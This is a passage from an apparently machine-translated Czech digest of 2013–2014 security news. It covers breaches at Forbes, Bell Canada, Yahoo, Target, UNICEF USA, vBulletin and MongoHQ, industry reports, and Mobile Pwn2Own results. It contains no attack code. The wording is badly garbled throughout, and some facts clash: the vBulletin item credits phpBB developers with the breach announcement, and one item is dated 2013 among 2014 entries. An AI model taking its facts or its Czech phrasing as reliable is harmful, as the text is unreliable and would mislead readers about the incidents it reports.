se zabránilo kybernetických útoků. S jasnější pochopení zranitelnosti (prosazovaný 53% respondentů v USA a 50% celkové) a mají inteligenci, o připravovaných hrozeb (44% v USA a 47% celkově) ukázala nejpopulárnější odpovědi. Další poznatky amerických:

Cena: 29% respondentů odhaduje úspěšný kybernetický útok by stálo jejich organizace více než 75 milionů amerických dolarů, dalších 20% uvedlo, že více než US $ 15 milionů.
Příčina útoků: skupina identifikována jako nejpravděpodobnější montáž cílové útoky nejvyšším počtem amerických respondentů bylo organizované skupiny podvodníků (55% respondentů). Američané byli více znepokojeni, které jsou zapojeny do průmyslové špionáže, než jakýkoli jiný trh (47% ve srovnání s 40% v Kanadě, 37% ve Velké Británii a 35% v Austrálii).
Se týkají: Na otázku, co by byli nejvíce znepokojeni v případě úspěšného útoku, nejvíce obyčejná odezva v USA byl ztrátu dat zákazníků (61%). Druhé hodnocení se týkají mimo USA respondentů byla krádež duševního vlastnictví, - s Američany výrazně více zajímají o IP krádeže než jiné trhy (47% respondentů a ve srovnání s 38% v Kanadě, 35% ve Velké Británii, a 43% v Austrálii).
Důvěra: podstatná většina (88%) byli přesvědčeni, ve schopnosti jejich organizace, aby se zabránilo cílených kybernetických útoků. Menší, ale stále velká většina (77%), byli přesvědčeni, ve schopnosti svého sektoru, aby se zabránilo útokům.
Krizové plány: 28% amerických organizací dotazovaných ještě neměl, nebo nevěděli, krizových plánů v případě kybernetického útoku na jejich společnosti. Z těch respondentů, kteří se mají krizové plány, 56% si myslí, tito byli dobře zveřejněny. V Kanadě 70% dotázaných uvedlo, že krizové plány, ale jen 37% z těch, s plány uvedli, že byli dobře zveřejněny.
Konvergence: Z těch respondentů, kteří se setkávají cyber-umožnil podvod, 55% amerických respondentů a 50% kanadských respondentů očekává počítačové hrát stále významnější úlohu v oblasti finančního podvodu.
"Co tento výzkum jasně ukazuje, že americké firmy si stále více uvědomují kybernetickém ohrožení a mají řadu protiopatření v místě. Nicméně, digitální zločin jako celek - nebezpečná kombinace organizovaných skupin pachatelů trestné činnosti s využitím počítačové techniky provádět finanční trestné činnosti - je také velkým problémem, zejména proto, že nejnovější vlna high-profil útoky, "říká Martin Sutherland, výkonný ředitel , BAE Systems Applied Intelligence. "A jako počet cest otevřených zločinci v hyper-propojeném světě se zvyšuje, jsme svědky skutečné hlad ze strany podniků pro jasnější pochopení jejich vlastní zranitelnosti a až na minutu počítačové hrozby inteligence.


SEA hacky Forbes, krade a nevrací záznamy o uživatelích 1M
26.2.2014 Hacking
Obchodní zpravodajský web Forbes a jeho registrovaní uživatelé jsou nejnovější obětí syrské elektronické armády (SEA) hacker kolektivní, který ukázal , že se vloupal do firemní sítě a vzlétl s databází obsahující více než 1 milion uživatelů a některé Forbes 'staffers záznamy . " Forbes.com byl zaměřen na digitální útoku a naše publikační platforma byla ohrožena, "která stojí za zveřejnění TEXT potvrdil krátce po zjevení, a varoval: "E-mailová adresa pro každého registrovaného Forbes.com byl vystaven prosím. mít na pozoru před e-maily, které purport pocházejí z Forbes, jako je seznam e-mailových adres, mohou být použity v oblasti phishingových útoků. " Také dodal, že hesla byly zašifrovány, ale že uživatelům udělá dobře, je v každém případě změnit jednou podepsat-na je znovu k dispozici. Poté, co zpočátku tvrdil, že by prodat databázi, SEA hackeři rozmysleli a dělal to k dispozici pro veřejnost ke stažení. Sophos 'Paul Ducklin a jeho kolegové se podařilo dostat své ruce na soubor, a zjistil, že záznamy obsažené uživatelská jména, šifrovaná data heslem, plná jména uživatelů, e-mailová adresa a další. Oni analyzovali data, a zjistil, že hesla nebyla šifrována, ale solené a hash. "Oni používají to, co se nazývá PHPass Přenosný formát," sdílené Ducklin, a vysvětlil, jak to funguje. "můžete" pracovat pozpátku "od Forbes datatbase k obnovení hesla, ale budete potřebovat hodně výpočetního výkonu, nebo čas, nebo obojí, "poznamenal a dodal schéma je dobré v případě, že uživatel zvolil složité a dlouhé heslo. , ale poté, co se jim podařilo prolomit hesla, které patří do Forbes staffers, bylo jasné, že i oni používají velmi špatné heslo. "Forbes udělal špatnou věc tím, že se porušila na prvním místě, a tím, že nechá SEA zmizet s jeho heslem databází, "komentoval Ducklin. "A zatímco 8193-iterace MD5 na bázi hašování popsaný systém je trochu krátký moderní osvědčených postupů (zkuste silnější hash, který trvá déle, než se počítat s více iterací), je to lepší než Adobe katastrofální "jeden klíč pro všechny šifrování "Systém.


Hackeři porušení Bell Canada, úniku zákaznické informace a hesla
10.2.2014 Incidenty | Hacking
Hacker skupina NullCrew se podařilo pro přístup k serverům, které patří do Bell Canada - nebo dodavatel třetí strany, jako Bell tvrdí - a krást a v konečném důsledku úniku uživatelská jména a hesla, e-mailové adresy, dílčí údaje o kreditní kartě a více asi 20.000 + zákazníků Bell. NullCrew hackeři oznámila, že únik před několika týdny, a byly zveřejněny údaje výpisem tuto sobotu. Místo hosting výpis byl uveden do režimu offline, ale ne dříve, než někteří výzkumníci zabezpečení a pravděpodobně někteří počítačoví podvodníci se podařilo stáhnout. blogger za DataBreaches.net se dotazoval na hackery, a bylo prokázáno screenshotů z rozhovorů a na hacking procesu, který doložit své tvrzení, že oni měli přístup k serveru Bellova pro měsíce, a že oni (neúspěšně) pokusil informovat Bell ní a zranitelnosti, která jim umožnila montáž SQL injekce proti řízení ochrany přihlašovací stránce společnosti (https:/ / protectionmanagement.bell.ca/passwordrecovery_1.asp). Po krátkém vyšetřování, Bell Canada potvrdil informace kompromis, ale řekl, že servery v otázce nejsou jejich. "Bell dnes oznámila, že 22.421 uživatelská jména a hesla a 5 platnou kreditní kartu počet Bell malé firemní zákazníky byly zveřejněny na internetu tento víkend. vysílání výsledky z nelegální hacking informačních technologií systému Ottawa na bázi třetí strany dodavatele to, "že uvedl v neděli. "V souladu s našimi přísnými zásadami ochrany osobních údajů a bezpečnosti , Bell je kontaktovat postižených malých firemních zákazníků, má zakázané všechny dotčené hesla, a informoval příslušné společnosti vydávající kreditní karty. Budeme i nadále spolupracovat s dodavateli, stejně jako prosazování práva a bezpečnostním vládní úředníky, aby věc vyšetřil. vlastní sítě Bellova a IT systémy nebyly ovlivněny. " NullCrew stále tvrdí, že je to vlastní servery, Bell, který dostal hacknutý, ale společnost zopakovala své tvrzení, že patří k dodavateli třetí strany. Security badatel Adam Caudill komentoval na Twitteru, že Bellova verze by mohla být pravda. "Viděl jsem více než jednou, kde subdoména velké společnosti bodů na třetí osobu," řekl řekl a dodal, že jeho společnost hostí jeden pro "velmi velké banka ". "Tak to je docela možné, že se pravdu. Měly by trvat ještě větší zodpovědnost za své údaje však," dodal. Dalším Twitter uživatel hledal šetření subdomény v otázce, a ukázalo se, že je registrován Ottawa bázi Magma komunikace.


Yahoo Mail účty ohrožena v koordinovaný útok
8.2.2014 Incident | Kriminalita | Hacking
Neznámý útočník se pokusil o přístup k několika Yahoo Mail účty, společnost varoval ve čtvrtek, a vyzval uživatelům změnit své heslo, i když nebyly ovlivněny.

"Na našich současných poznatků, seznam uživatelských jmen a hesel, které byly použity k provedení útoku byl pravděpodobně shromážděny z databáze třetí strany kompromisu. Nemáme žádný důkaz, že byly získány přímo od systémů Yahoo," sdílené Jay Rossiter, Yahoo senior viceprezident platforem a personalizace výrobků. "Naše pokračující vyšetřování ukazuje, že škodlivý počítačový software používá seznam uživatelských jmen a hesel pro přístup k Yahoo Mail účty. Informace požadované v útoku se zdá být jména a e-mailové adresy z nejvíce postižených účty" poslední odeslané e-maily. " Společnost provedl reset hesla na impaktovaných účtů, a dotčené uživatelé budou vyzváni k opětovnému zajištění jejich účty změnou hesla. "Kromě přijímání lepších heslo postupy změnou své heslo pravidelně a za použití různých variant symbolů a postav, uživatelé by nikdy neměli používat stejné heslo na více místech nebo služeb, "dodal. "Použití stejné heslo na více místech nebo služeb činí uživatelům obzvláště zranitelné vůči těmto typům útoků." Společnost neřekl, kolik mailové účty byly ovlivněny. napadených účtů mohly být použity k rozesílání nevyžádané pošty přímo, ale Shromážděné informace (jména a e-maily kontakty "), lze také použít, aby se scammy e-maily z jiných zdrojů vypadat legitimní.


16 milionů přihlášení ohrožena, varuje německý INFOSEC agenturu
31.1.2014 Hacking

Německý Spolkový úřad pro informační bezpečnost (BSI) vydala v úterý oznámení varování, že asi 16 milionů on-uživatelské účty byly ohrožena, a vyzvala uživatele k zda oni jsou mezi nimi.

Jedná se o údaje zřejmě objevili donucovacích orgánů po analýze botnety. Bohužel, BSI nesdílel další podrobnosti o vyšetřování. Oni řekl, že to není přesně jasné, jak a kdy se operátoři botnet se shromažďují tyto e-mailové adresy a hesla, ale že je také možné, že si koupil některé údaje z jiných zločinců. Vzhledem k tomu, e-maily jsou často používány jako výchozí uživatelská jména pro různé on-line účtů (e-mailových účtů, nakupování on-line, sociálních sítí, poskytovatelé internetových služeb), agentura nastavit webové stránky, kde mohou uživatelé zadat svou e-mailovou adresu a nechte jej zkontrolovat . podle seznamu napadených ty V případě, že byl, uživatelé jsou vyzýváni, aby pomocí AV řešení, kontrolovat jejich počítače malware, a pak okamžitě změnit všechny své on-line hesla -., a ne používat stejný jeden pro více účtů Důvodem, Proto agentura vydala toto varování je, že polovina z napadených účtů skončí . de , což znamená, že více než pravděpodobné, že patří k německým občanům. Podle místní , tento krádež digitálních identit byl objeven v prosinci 2013, ale agentura vzal svůj čas informovat potenciální oběti, protože potřebovali, aby to nastavit na výše uvedené webové stránky. I tak webové stránky byly původně havaroval počátečním lavina uživatelů. Zatím, někteří 880.000 + uživatelé, kteří používají místo zjistili, že byly ovlivněny.


20M Jihokorejci ovlivněny zasvěcených krádeže dat
28.1.2013 Hacking | Kriminalita

Osobní a finanční údaje o asi 20 milionů Jihokorejců bylo ohroženo poradce pracující pro osobní ratingy firmy Korea Credit Bureau (KCB), AFP hlásí .

To je jeden z největších úniků dat v historii země, a byl zřejmě ovlivněn dvě pětiny veškerého obyvatelstva. zasvěcených v otázce měl přístup k interním serverům řady kreditních karet firem a ukradli uživatelských databází KB Kookmin karta, Lotte karty a NH Nonghyup karty. Informace ohrožena uživatele obsahuje jména zákazníků, telefonní čísla, čísla sociálního pojištění, čísla kreditních karet a datum vypršení platnosti. Zasvěcených prodával informace na telefonní marketingových společností. Po vyšetřování zjistili, co se stalo, zasvěcených a manažeři firem, kteří si koupili údaje byly okamžitě zatčen. Podle zprávy, budou postiženi uživatelé, hradí platební kartou společnosti v případě, že ztratí peníze kvůli kompromisu. Navzdory závažnosti porušení, Jihokorejci by neměla být šokován incidentu. V posledních dvou nebo třech letech, tam bylo docela málo podobné krádeže dat, a to buď provádí hackery nebo zasvěcenci. Jak se to stane, bývalý byly obvykle po osobní informace uživatelů, přičemž jen za poslední měsíc zaměstnanec Citibank Korea ukradl Informace o 34.000 klientů banky, včetně podrobností o jejich úvěrových smluv, a prodal ho do soukromých poskytovatelů úvěrů služeb. Nesouhlas ze strany Úřadu Nedostatečné zabezpečení také poznamenal, že cizinci s kreditními kartami z jihokorejských společností jsou potíže objevují, zda jejich informace byly v ohrožení dávce. Také, že manažeři v KB finanční skupiny a její jednotky KB Kookmin karty nabízejí, aby odstoupil v důsledku porušení.


Explozivní růst pokročilých útoků a škodlivého provozu

26.1.2014 Počítačový útok | Hacking

Výroční zpráva Bezpečnostní Cisco 2014, dnes zveřejnila, ukazuje, že hrozby, jejichž účelem je využít důvěry uživatelů v systémech, aplikacích a osobních sítí dosáhly překvapivé úrovně. Podle zprávy, celosvětový nedostatek téměř milion kvalifikovaných odborníků zabezpečení je vliv schopnosti organizací pro sledování a bezpečné sítě, zatímco celkové zranitelnosti a hrozby dosáhly nejvyšší úrovně od roku 2000.

Zjištění ve zprávě nabízejí živý obraz rychle se vyvíjejících bezpečnostních výzev, kterým čelí podniky, IT oddělení a jednotlivců. Metody útočník patří sociálně inženýrství krádežím hesel a přihlašovacích údajů, skrývají-in-plain-pohled infiltrace a využívání důvěry potřebné pro ekonomické transakce, vládních služeb a sociálních interakcí. Zpráva uvádí nedostatek více než milion bezpečnostních profesionálů po celém zeměkoule v roce 2014. Propracovanost technologie a taktiky používané pro on-line zločinci-a jejich nonstop pokusy porušení sítí a krást data, které předčilo schopnost IT a bezpečnostních profesionálů k řešení těchto hrozeb. Většina organizací nemají lidé nebo systémy, které průběžně sledovat rozšířen sítě a detekci infiltrace, a pak použít ochranu, včas a účinným způsobem. Sto procent vzorku 30 největších světových nadnárodních podnikových sítí generované návštěvník návštěvnost webových stránek, které obsahují malware. Devadesát šest procent sítí přezkoumat sděleny provoz na unesených servery. Podobně 92 procent přenášeny návštěvnost webových stránek bez obsahu, který se obvykle hostit škodlivou činnost. DDoS útoky , které narušují provoz do az cílených internetových stránek a může paralyzovat ISP, jak v objemu a závažnosti se zvýšily. Některé DDoS útoky se snaží ukrýt před jinou zločinnou činnost, například podvodu drátu, během nebo po hlučném a rozptylující DDoS kampaně. Víceúčelové trojské koně počítá jako nejčastěji setkal web-doručena malware, 27 procent z celkových setkání v roce 2013. Škodlivé skripty, jako je využije a iframe, tvořil druhou nejčastěji setkali kategorii na 23 procent. krádeži dat trojské koně, jako jsou hesla zloděje a zadní vrátka tvořily 22 procent celkových web malware setkání. Stabilní pokles v jedinečné malware hostitele a IP adres-dolů 30 procent mezi lednem 2013 a zářím 2013, naznačuje, že malware je soustředěna v méně hostitelů a méně IP adres. Java nadále nejčastěji využíván programovací jazyk terčem on-line zločinci. Data z Sourcefire, nyní součástí Cisco, vyplývá, že Java využije tvoří převážnou většinu (91 procent) z ukazatelů kompromisu (IOCs). Devadesát devět procent všech mobilních malware cílových zařízení se systémem Android. Na 43,8 procenta, Andr / Qdplugin-byl nejčastěji setkali mobilní malware, obvykle prostřednictvím přeměněných kopie legitimních aplikací distribuovaných prostřednictvím neoficiálních tržištích. Specifické sektory, jako je farmaceutický a chemický průmysl a elektroniky zpracovatelského průmyslu, historicky Měl vysoké malware ceny setkat. V roce 2012 a 2013, tam byl významný nárůst malwaru setkání pro zemědělství a těžebního průmyslu, dříve sektoru relativně nízké riziko. Malware setkání také pokračoval růst v odvětví energetiky, ropy a zemního plynu. John N. Stewart, senior vice president, ČSÚ, Threat Response inteligence a rozvoj, Cisco, řekl: "I když Výroční zpráva Bezpečnostní Cisco maluje ponurý obraz proudu stav kybernetické bezpečnosti, existuje naděje na obnovení důvěry u lidí, institucí a technologií - a to začíná posílení obránce s real-svět znalosti o rozšíření útok povrchy. Chcete-li opravdu chránit proti všem těmto možným útokům, musí obránci pochopit útočníky, jejich motivace a jejich metody - před, během a po útoku "


Uživatel finanční informace ohrožena v americkém fondu UNICEF porušení
24.1.2014 Hacking

Americký fond pro UNICEF, nezisková nevládní organizace se sídlem v New Yorku, oznámil Úřad New Hampshire generálního prokurátora, že utrpěl porušení v listopadu 2013. Podle dopisu , na 02.12.2013 oni objevili, že neoprávněné osoby mají přístup k jedné ze svých serverů nebo na 4. listopadu. "Po objevu, americký fond okamžitě vypnuli postižený server a odpojení od sítě US fondu," oni říkají , s tím, že mají okamžitě zahájila vyšetřování ve věci , a najal nezávislé třetí strany, počítačové forenzní firma jim pomoci při vyšetřování a pomoci jim zjistit totožnost osob, jejichž údaje mohou být vystaveny. Zjistili, že útok byl omezen na jeden server, a to jména, telefonní čísla, info o platebních kartách (i bezpečnostní kód a datum vypršení platnosti), a bankovní účet info ze tří obyvatel New Hampshire byly ohroženy. Dotčené osoby byly oceněny situace a byly poskytnuty s volným rok úvěrového monitoringu a obnovy identity služby s allCLEAR ID, stejně jako informace o tom, jak se chránit před podvody a krádežemi identity. organizace nesdílel celkový počet fyzických osob, jejichž údaje byly ohrožena New Hampshire generálního prokurátora, ale soudě podle obsahu oznámení mají připojené k dopisu, Severní Karolína a Maryland obyvatelé byli také ovlivněna porušením. Oni také nezapomeňte na vědomí, že doposud se jim podařilo nalézt žádné důkazy o pokusu nebo skutečného zneužití ohrožení informací.


Osobní info 70 milionů cílových zákazníků ohrožena
18.1.2014 Hacking | Kriminalita

Cílová dnes oznámila, aktuální informace o své pokračující vyšetřování nedávné porušení dat . Jako součást cílových probíhající soudní vyšetřování, bylo zjištěno, že některé informace host - odděleně od dat platebních karet dříve popsanými - byla přijata v průběhu narušení dat.

Tato krádež není nový porušení, ale byl odhalen jako součást probíhajícího vyšetřování. V tomto okamžiku, vyšetřování zjistí, že ukradené informace zahrnují jména, poštovní adresy, telefonní čísla nebo e-mailové adresy pro až 70 milionů lidí. Většina těchto údajů je částečná v přírodě, ale v případě, že cíl má e-mailovou adresu, Společnost se bude snažit kontaktovat postižené hosty. Tato komunikace bude informační, včetně tipů na ochranu proti spotřebitelské podvody. Cílová nebude žádat ty hosty, aby poskytovat žádné osobní informace jako součást tohoto sdělení. "Já vím, že je to frustrující pro naše hosty, aby se dozvěděli, že tato informace byla přijata, a my jsme opravdu líto, že mají na to vydržet," řekl Gregg Steinhafel , předseda představenstva, prezident a generální ředitel společnosti, Target. "Chci také, aby naši hosté věděli, že porozumění a sdílení fakta vztahující se k této události je pro mě důležité a celý Target týmu." Hosté budou mít nulovou odpovědnost za náklady jakýchkoliv podvodných poplatků vyplývajících z porušení. Chcete-li poskytnout další klid, Target nabízí jeden rok zdarma úvěrového monitoringu a ochrany proti krádeži identity pro všechny hosty, kteří nakupovali našich obchodech v USA. Hosté budou mít tři měsíce na to, zapsat do programu.


Podvodná reklama na Yahoo zotročila počítače pro bitcoin

17.1.2014 Kriminalita | Hacking
Až 2 milióny evropských uživatelů si do svých počítačů stáhlo malware poté, co klikli na reklamu umístěnou na domovské stránce Yahoo.

Některé z infikovaných počítačů se poté bez vědomí jejich majitelů zapojily do těžby virtuální měny bitcoin, čímž mohlo dojít k jejich výraznému zpomalení.

Yahoo sklidilo vlnu kritiky kvůli pomalé reakci na vzniklý problém. Společnost odmítala říci, kolika uživatelů by se problém mohl týkat, a postiženým uživatelům neposkytla žádnou pomoc ani nenabídla nějaké rychlé řešení.

Ve svém pozdějším prohlášení Yahoo uvedlo: „V období od 31. prosince do 3. ledna se na našich evropských stránkách objevila inzerce, která nesplňovala naše publikační pravidla – přesněji řečeno, šířila malware.“ Uživatelům na jiných kontinentech se škodlivá reklama nezobrazila. Stejně tak se problém nijak nedotkl majitelů Maců a mobilních zařízení.

„Budeme i nadále pokračovat v hledání a blokování všech reklam používaných k takovým aktivitám. Naše uživatele budeme brzy informovat o dalších krocích,“ ujistilo Yahoo.

Podle bezpečnostní firmy Light Cyber, která Yahoo na problém koncem prosince upozornila, jeden ze šířených programů zapojoval uživatelské počítače do těžby bitcoinu. V praxi to znamená, že na infikovaných zařízeních docházelo k provádění složitých výpočtů, což znemožnilo jejich běžné používání.

Nizozemská společnost Fox IT odhaduje, že v období, kdy se škodlivá reklama běžně zobrazovala evropským uživatelům, docházelo přibližně k 27 tisícům infekcí za hodinu. Pokud by se tedy reklama zobrazovala ve stejné intenzitě po dobu 3 dnů, znamenalo by to, že infikovány byly téměř 2 milióny počítačů.

Útočníci k instalaci malwaru využili neopravených zranitelností ve starších verzích Javy. Pokud si tedy pravidelně stahujete nejnovější aktualizace, pak se vás problém zřejmě nijak netýká.


vBulletin.com hacknutý, hackeři snaží prodat informací na 0-day použít

19.11.2013 Zranitelnosti | Hacking

Vývojáři populárního softwaru internetové fórum phpBB již oznámil v noci na pátek, že jejich síť byla napadena a úspěšně porušení, a že zúčastněné hackeři přístup zákazníků ID a zašifrovaná hesla na svých systémů. Společnost reagovala okamžitě resetování hesla všech uživatelů a žádá, aby si zvolili novou, komplexní, že nebude používat na jiných stránkách, ale nesdílí další podrobnosti o tom, jak hack stalo. ale další skupina. Hacker skupina Inj3ct0r Team přihlásila k odpovědnosti za hack na své stránce na Facebooku, a oni mají také tvrdil, že ti, kteří porušili MacRumors fóra a tak pravděpodobně odešel s databází obsahující hesla svých registrovaných uživatelů 860000. MacRumors vlastníkem webu Arnold Kim řekl, že přístup používaný útočníků byl ten stejný používal ohrozit Ubuntu fóra zpět v červenci: podařilo dostat své ruce na účet pověřovacích listin moderátor a byli schopni stupňovat svá práva, aby se přístup k heslu databáze. To musí být ještě potvrzena, jak se jim podařilo dostat moderátora pověření účtu na prvním místě, ale pokud Inj3ct0r Team tvrzení mají být věřil, využili z zero-day zranitelnosti kritické ovlivňující verze 4.xx a 5. х.x na vBulletinu. "Máme nahrát shell v serveru vBulletin, stáhněte si databázi a dostal kořen," oni psali . "Chtěli jsme dokázat, že nic v tomto světě není bezpečné." Zdá se, že se stejná chyba byla použita k porušení MacRumors. Ubuntu fóra také běžel na vBulletinu. Existence této zranitelnosti je ještě nepotvrzená společností, ale můžete si být jisti, že pracují zuřivě ji objevit (pokud je k dispozici). hacker tým je zřejmě otevřeně prodávají informace o tom, . a možná oprava pro chybu zabezpečení v otázce Do té doby, tam jsou některé, které zřejmě věří Inj3ct0r tým tvrzení - nebo alespoň nejsou ochotni ohrozit své uživatele. Defcon fóra byly zakázány až do rozlišení zranitelnosti, a bude zpět, když patch je venku a je nainstalován. UPDATE: Wayne Lukáš vBulletin Technická podpora Lead, který oznámil , že se analyzují důkazy poskytnuté týmu Inject0r a že nevěří, že hackeři odkryli 0-day zranitelnost v vBulletin. "Tyto hackeři byli schopni ohrozit nezabezpečeného systému, který byl použit pro testování vBulletin mobilní aplikace. Nejlepší obranou proti možnému kompromisu je, aby váš systém běží na Nejmodernější náplast verze softwaru, "dodal.


Privilegované ohrožení Analytics pro detekci rozpracovaných útoky

19.11.2013 Zabezpečení | Hacking

CyberArk oznámila dostupnost zvýhodněného Threat Analytics, řešení analytika pro detekci škodlivého chování privilegovaný účet a narušit rozpracovaných útoky dříve, než dojde k poškození pro podnikání.

Privilegované účty byly identifikovány jako primární cíl ve vnitřním a vnějším útokům pokročilé. Podle Mandiant, "APT vetřelci raději využít privilegované účty, kde je to možné, jako správci domény, servis účty domény s oprávněními místního správce, účty a účty privilegovaný uživatel." CyberArk Privilegované Threat Analytics poskytuje cílené a okamžitě žalovatelné hrozba Analytics na těchto útoku . fotograf identifikaci dříve nezjistitelné škodlivého vynikající chování uživatele, která umožňuje reakce na incidenty tým reagovat a narušit rozpracovaných útoky klíčové výhody patří:

Identifikuje rozpracovaných vnějším útokům a škodlivému chování autorizovaných insiderů
Detekuje řadu anomálií ve vzorci chování jednotlivých privilegovaných uživatelů v reálném čase, jako je například uživatel, který přistupuje najednou pověření v neobvyklou denní dobu. To je silný indikátor nebezpečné činnosti nebo závažných porušení zásad, jako je sdílení hesla
Zlepšuje účinnost systémů SIEM a týmy Incident Response snížením falešných poplachů
Zastaví in-progress útok dříve v kill řetězci, což zajišťuje méně nákladné a časově náročné sanační proces
Průběžně se učí chování uživatele a upravuje posuzování rizik na základě oprávněných privilegované vzory aktivit uživatelů.
"Privilegovaný uživatel profilování chování může být rozhodující zbraní v boji proti vnější i vnitřní hrozby tím, že objeví abnormální chování brzy," řekl Charles Kolodgy, viceprezident pro výzkum společnosti IDC pro bezpečnostní produkty služby. "Klíčem k vynalézavým řešením je CyberArk je analyzovat správná data - to je činnost privilegovaných uživatelských účtů - poskytuje vysokou hodnotu, žalovatelné inteligenci na kritickém útoku."


Pohled do porušení MongoHQ

19.11.2013 Hacking | Kriminalita

Nedávná narušení bezpečnosti v MongoHQ (MongoDB cloud poskytovatel služeb) opustil společnost tvrdě pracuje obvázat bezpečnostní díry. Bohužel běžné, byla tato porušení zjištěna jen když jeden z MongoHQ zákazníků je ( Buffer ) si uvědomil, že byl hacknut.

Po útoku MongoHQ udělal správnou věc, že se omluvil svým zákazníkům, podrobně jejich bezpečnostní chyby (některé jsou docela ohromující) a je stanoveno, jaké akce se s zmírnit bezpečnosti. Přestože akce, které MongoHQ vzal si zlepšit bezpečnost, datová služba a zákazníci měli ptát sami sebe, zda jejich data jsou stále dostatečně zabezpečen. Jakmile je poskytovatel dat je porušena, svým zákazníkům jako první trpí. A při projednávání poskytovatele služeb, "malé" hacky mají potenciálně exponenciální efekt. Jakmile jeden server byl porušen, jsou všechny databáze a zákazníky, které je vlastní porušena. Jsi nejslabší! Pokud jste poskytovatele datových služeb s stovky či dokonce tisíce zákazníků, získání hacknutý je jen otázkou , kdy - a když se to stane znovu. Cílené útoky hledat nejslabší článek v oblasti bezpečnosti. Když nejslabší článek je datový poskytovatel služeb, a ne zákazník, může útočníci dostat chamtivý a nespokojí jen jeden cíl. Citace z MongoHQ: "V současné době se zdá, že neoprávněný uživatel byl skenování pro sociální média ověřování informací pro účely spamování, sondování a finanční informace v databázi zákazníků" Zde jsou některé z otázek, které dělaly hack MongoHQ možné:

Žádosti o podporu byla přístupná přes web a ne za VPN
Zákaznická data byla viditelná pro uživatele tohoto podpůrného použití (co kdyby byl kompromis zaměstnance?)
Dvoufaktorová autentizace nebyl realizován
Nebylo správy uživatelských práv.
Zabezpečení dat vyžaduje, no, nějaké zabezpečení dat

, i když mnoho faktorů, které byly odpovědné za toto porušení (jako "přehnané a nepoužité výsadách", "Privilege" a "zneužívání v Unmanaged citlivá data"), MongoHQ porušení příčinou je příklad jednoho z Deset databáze hrozeb : "Vnitřní bezpečnostní kontroly se nedrží krok s růstem dat a mnoho organizací jsou špatně vybavené k řešení narušení bezpečnosti. Často je to kvůli nedostatku odborných znalostí potřebných pro provádění bezpečnostních kontrol, politiky a školení. " To znamená, že organizace by měla spoléhat na zabezpečení odbornosti třetí strany podniků namísto vynalézat kolo, nebo prostě zavírají oči. Bezpečnost dat je obchodní jeho vlastní, údaje poskytovatelé služeb by neměl být překvapen, když poruší dojít k nezabezpečených dat a jejich zabezpečení, křivka učení - a jejich zákazníky (ty, které jsou ponechány) - může být docela dlouhá a bolestivá. Vzhledem k tomu, porušení, MongoHQ brali velmi významná bezpečnostní opatření, ale hlavně je využít třetí strany ověření jejich bezpečnosti. Se velkých objemů dat je velká zodpovědnost Limited odbornost v oblasti zabezpečení a vzdělávání je nejen poskytovatele služeb problém, je to také skutečný zájem o jeho spotřebitelů. Byly MongoHQ zákazníci vědomi toho, že jejich citlivé údaje bylo vidět na aplikační podpory MongoHQ? Víte, kdo může přistupovat k datům? Jak je uložen? Může to být kopírován? To vše jsou otázky, které jsou až příliš často zapomíná, a to zejména u mladých začínajících společností, kteří touží vytvářet aplikace a vyhnout se řešení bezpečnostních a řízení nákladů. Zákazníci potřebují vědět, co jejich poskytovatelé služeb dělají chránit svá data. To se nedávno stal nový mandát s nárůstem PCI DSS 3.0 , kde poskytovatelé služeb jsou nyní odpovědné za ochranu údajů svých zákazníků. Zabezpečení datového centra musí být venku, a to zejména "v cloudu". Zatímco dělá vaše data někoho jiného problému je pěkný fantasy, jste stále zodpovídat, když je odcizen nebo poškozen. Nemůžete zaručit dostupnost dat při používání služby poskytovatele dat, ale můžete alespoň zlepšit svou integritu a důvěrnost. Joel Gascoigne z vyrovnávací paměti také si to uvědomil, když psal o Hacker News : "Chci, aby bylo jasné, že je to stále naše chyba. Pokud přístupové tokeny byly zašifrovány (které jsou nyní), pak by to bylo možné předejít. " Vy, jako zákazník by bylo chytré, aby se zodpovědně svých vlastních údajů. Rozpoznat, kde se vaše citlivá data a připravit je na nevyhnutelný den, kdy je ohrožena to. Navíc, my jako zákazníci potřebují držet naši poskytovatelé služeb odpovědný za bezpečnost, ne jen "vzít své slovo." Autoři: Barry Shteiman, Michael Cherny a Sagie Dulce z Imperva.


Safari, Chrome a Samsung Galaxy S4 sundán v mobilním Pwn2Own
17.11.2013 Hacking | Zabezpečení
Výsledky druhého ročníku soutěže Mobile Pwn2Own končí dnes v PacSec aplikované bezpečnostní konferenci v Tokiu v Japonsku se v: úspěšné kompromisy patří Samsung Galaxy S4 v kategorii OS a Safari a Chrome v mobilním prohlížeči kategorii. Čínská Keen Team ( od Keen Cloud Tech) ukázal dvě oddělené Safari exploity, které jim umožnilo zachytit Facebook pověření iOS verze 7.0.3 a kradou fotografie na iOS verze 6.1.4. "První byla aplikace využít. Via Safari, tým byl schopný ukrást Facebook cookie, který byl pak exfiltrated a použity k ohrožení cílené Facebook účtu z jiného počítače. Aby exploitu do práce, by uživatel musí kliknout na odkaz v e-mailu, zprávy SMS, nebo webové stránky, takže někteří společenský konstrukce se nutné vyzvat uživatele, aby žalobu jejich pověření by mohla být ohrožena , " vysvětlila Heather Goudey, senior obsah zabezpečení vývojář společnosti HP (společnost, jejíž Zero Day Initiative je za soutěže). Druhý byl také exploit Safari, který využil chyb v aplikace modelu oprávnění, a také třeba interakce uživatele ( klikněte na odkaz). Výzkumníci hrabal v 27,500dolar v odměnách - to by bylo víc, kdyby se zaměřili a podařilo ohrozit pískoviště.

Japonský tým MBSD (od Mitsui směrech Bussan Secure) přišli s řadou AA využije zaměřených na různé výchozí aplikace na Samsung Galaxy S4 a podařilo se řetězce dohromady, aby se tajně nainstalovat škodlivý pro krádež dat aplikace na zařízení. Aplikace byla schopna exfiltrate data, jako jsou kontakty, záložky, historii prohlížení, SMS zpráv, a tak dále. Je také dobré vědět, že se využije k práci, cílené uživatelé ani nemají povinnost klikněte na odkaz, ale prostě musí se zlákat k návštěvě speciálně vytvořené webové stránky. "Důsledky pro tuto zneužití jsou znepokojující. I když může být zdrženlivý kliknout na odkazy (dbát běžně dána, i když poněkud směšné rada "zacvaknutí pečlivě"), je nepravděpodobné, že byste zhodnotit rizika a dbát na opatrnost se stejným způsobem na mobilních zařízeních, jako na ploše, "Goudey poukázal . "Tato zpráva zde je však jasné - mobilní platformy jsou citlivé na stejné nebo velmi podobné metody šíření škodlivého softwaru, které trápí plochu a měli byste být moudré, aby se na pozoru." cenu, že japonský tým odnesl částku 40.000 dolarů. Druhý den soutěže, dospívající bezpečnostní výzkumník, že jde o alias "PinkiePie" a který již úspěšně soutěžil v loňské Pwn2Own, podařilo kompromisů Chrome nejprve na Nexus 4 a pak na Samsung Galaxy S4. " využít využil dvou chyb - přetečení celého čísla, který 